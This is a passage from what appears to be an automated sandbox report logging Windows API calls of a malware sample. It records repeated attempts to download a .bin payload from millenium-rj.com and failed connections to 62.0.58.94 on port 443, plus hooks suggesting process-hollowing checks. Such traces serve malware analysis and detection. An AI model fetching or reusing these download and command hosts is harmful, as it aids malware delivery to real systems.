1623 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1624 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1625 }, { "timestamp": "2025-02-27 23:36:17,237", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1626 }, { "timestamp": "2025-02-27 23:36:17,237", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" } ], "repeated": 0, "id": 1627 }, { "timestamp": "2025-02-27 23:36:17,237", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1628 }, { "timestamp": "2025-02-27 23:36:17,237", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0074" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1629 }, { "timestamp": "2025-02-27 23:36:17,237", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1630 }, { "timestamp": "2025-02-27 23:36:17,237", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1631 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0078", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1632 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1633 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0078" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1634 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1635 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000518", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1304" } ], "repeated": 0, "id": 1636 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1637 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1638 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1639 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaw\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1640 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1641 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1642 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1643 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1644 }, { "timestamp": "2025-02-27 23:36:18,253", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1645 }, { "timestamp": "2025-02-27 23:36:20,316", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1646 }, { "timestamp": "2025-02-27 23:36:20,316", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" } ], "repeated": 0, "id": 1647 }, { "timestamp": "2025-02-27 23:36:20,316", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1648 }, { "timestamp": "2025-02-27 23:36:20,316", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0078" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1649 }, { "timestamp": "2025-02-27 23:36:20,316", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1650 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1651 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc007c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1652 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1653 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc007c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1654 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004f4" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1655 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000504" } ], "repeated": 0, "id": 1656 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000500" } ], "repeated": 0, "id": 1657 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1658 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000518" } ], "repeated": 0, "id": 1659 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000514" } ], "repeated": 0, "id": 1660 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004f4" } ], "repeated": 0, "id": 1661 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000050c" } ], "repeated": 0, "id": 1662 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1663 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000050c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1292" } ], "repeated": 0, "id": 1664 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1665 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 1666 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1667 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaz\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1668 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1669 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1670 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1671 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1672 }, { "timestamp": "2025-02-27 23:36:21,331", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1673 }, { "timestamp": "2025-02-27 23:36:23,394", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1674 }, { "timestamp": "2025-02-27 23:36:23,394", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" } ], "repeated": 0, "id": 1675 }, { "timestamp": "2025-02-27 23:36:23,394", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1676 }, { "timestamp": "2025-02-27 23:36:23,394", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc007c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1677 }, { "timestamp": "2025-02-27 23:36:23,394", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1678 }, { "timestamp": "2025-02-27 23:36:23,394", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1679 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0080", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1680 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1681 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0080" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1682 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1683 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000050c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1292" } ], "repeated": 0, "id": 1684 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1685 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1686 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1687 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca|\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1688 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1689 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1690 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000050c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1691 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1692 }, { "timestamp": "2025-02-27 23:36:24,409", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1693 }, { "timestamp": "2025-02-27 23:36:26,472", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1694 }, { "timestamp": "2025-02-27 23:36:26,472", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1292" } ], "repeated": 0, "id": 1695 }, { "timestamp": "2025-02-27 23:36:26,472", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1696 }, { "timestamp": "2025-02-27 23:36:26,472", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0080" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1697 }, { "timestamp": "2025-02-27 23:36:26,472", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1698 }, { "timestamp": "2025-02-27 23:36:26,472", "thread_id": "11036", "caller": "0x72dabc04", 